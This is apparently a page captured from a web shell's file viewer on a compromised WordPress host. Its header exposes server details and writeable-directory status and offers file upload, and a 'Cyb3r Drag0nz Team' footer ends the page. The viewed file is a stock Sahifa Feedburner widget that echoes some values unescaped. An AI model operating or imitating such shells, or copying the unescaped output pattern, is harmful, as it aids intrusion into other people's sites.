Server :
Apache
System :
Linux webd003.cluster126.gra.hosting.ovh.net 5.15.206-ovh-vps-grsec-zfs-classid #1 SMP Fri May 15 02:41:25 UTC 2026 x86_64
User :
atwiofrxug (73666)
PHP Version :
8.4.10
Disable Functions :
_dyuweyrj4,_dyuweyrj4r,dl
Current Directory :
/home/atwiofrxug/mylittletelaviv/wp-content/themes/sahifa/framework/widgets/
Directory Status:
Writeable | Document Root:
Writeable
Upload File
Viewing: /home/atwiofrxug/mylittletelaviv/wp-content/themes/sahifa/framework/widgets/widget-feedburner.php
<?php
add_action( 'widgets_init', 'tie_feedburner_widget_box' );
function tie_feedburner_widget_box() {
register_widget( 'tie_feedburner_widget' );
}
class tie_feedburner_widget extends WP_Widget {
public function __construct(){
$widget_ops = array( 'classname' => 'widget-feedburner' , 'description' => 'Subscribe to feedburner via email' );
$control_ops = array( 'width' => 250, 'height' => 350, 'id_base' => 'widget-feedburner' );
parent::__construct( 'widget-feedburner',THEME_NAME .' - '.__( 'Feedburner' , 'tie' ) , $widget_ops, $control_ops );
}
public function widget( $args, $instance ) {
extract( $args );
$title = apply_filters('widget_title', $instance['title'] );
if( function_exists('icl_t') ) $text_code = icl_t( THEME_NAME , 'widget_content_'.$this->id , $instance['text_code'] ); else $text_code = $instance['text_code'] ;
$feedburner = $instance['feedburner'];
echo $before_widget;
echo $before_title;
echo $title ;
echo $after_title;
echo '<div class="widget-feedburner-counter">
<p>'.do_shortcode( $text_code ).'</p>' ; ?>
<form action="https://feedburner.google.com/fb/a/mailverify" method="post" target="popupwindow" onsubmit="window.open('http://feedburner.google.com/fb/a/mailverify?uri=<?php echo $feedburner ; ?>', 'popupwindow', 'scrollbars=yes,width=550,height=520');return true">
<input class="feedburner-email" type="text" name="email" value="<?php _eti( 'Enter your e-mail address' ) ; ?>" onfocus="if (this.value == '<?php _eti( 'Enter your e-mail address' ) ; ?>') {this.value = '';}" onblur="if (this.value == '') {this.value = '<?php _eti( 'Enter your e-mail address' ) ; ?>';}">
<input type="hidden" value="<?php echo $feedburner ; ?>" name="uri">
<input type="hidden" name="loc" value="en_US">
<input class="feedburner-subscribe" type="submit" name="submit" value="<?php _eti( 'Subscribe' ) ; ?>">
</form>
</div>
<?php
echo $after_widget;
}
public function update( $new_instance, $old_instance ) {
$instance = $old_instance;
$instance['title'] = strip_tags( $new_instance['title'] );
$instance['text_code'] = $new_instance['text_code'] ;
$instance['feedburner'] = strip_tags( $new_instance['feedburner'] );
if (function_exists('icl_register_string')) {
icl_register_string( THEME_NAME , 'widget_content_'.$this->id, $new_instance['text_code'] );
}
return $instance;
}
public function form( $instance ) {
$defaults = array( 'title' =>__( 'FeedBurner Widget' , 'tie') , 'text_code' => __( 'Subscribe to our email newsletter.' , 'tie') );
$instance = wp_parse_args( (array) $instance, $defaults ); ?>
<p>
<label for="<?php echo $this->get_field_id( 'title' ); ?>"><?php _e( 'Title:' , 'tie') ?></label>
<input id="<?php echo $this->get_field_id( 'title' ); ?>" name="<?php echo $this->get_field_name( 'title' ); ?>" value="<?php if( !empty($instance['title']) ) echo $instance['title']; ?>" class="widefat" type="text" />
</p>
<p>
<label for="<?php echo $this->get_field_id( 'text_code' ); ?>"><?php _e( 'Text above Email Input Field:' , 'tie') ?><small><?php _e( '( Supports : Html & Shortcodes )' , 'tie') ?></small> </label>
<textarea rows="5" id="<?php echo $this->get_field_id( 'text_code' ); ?>" name="<?php echo $this->get_field_name( 'text_code' ); ?>" class="widefat" ><?php if( !empty($instance['text_code']) ) echo $instance['text_code']; ?></textarea>
</p>
<p>
<label for="<?php echo $this->get_field_id( 'feedburner' ); ?>"><?php _e( 'Feedburner ID:' , 'tie') ?></label>
<input id="<?php echo $this->get_field_id( 'feedburner' ); ?>" name="<?php echo $this->get_field_name( 'feedburner' ); ?>" value="<?php if( !empty($instance['feedburner']) ) echo $instance['feedburner']; ?>" class="widefat" type="text" />
</p>
<?php
}
}
?>
Cyb3r Drag0nz Team • Google Edition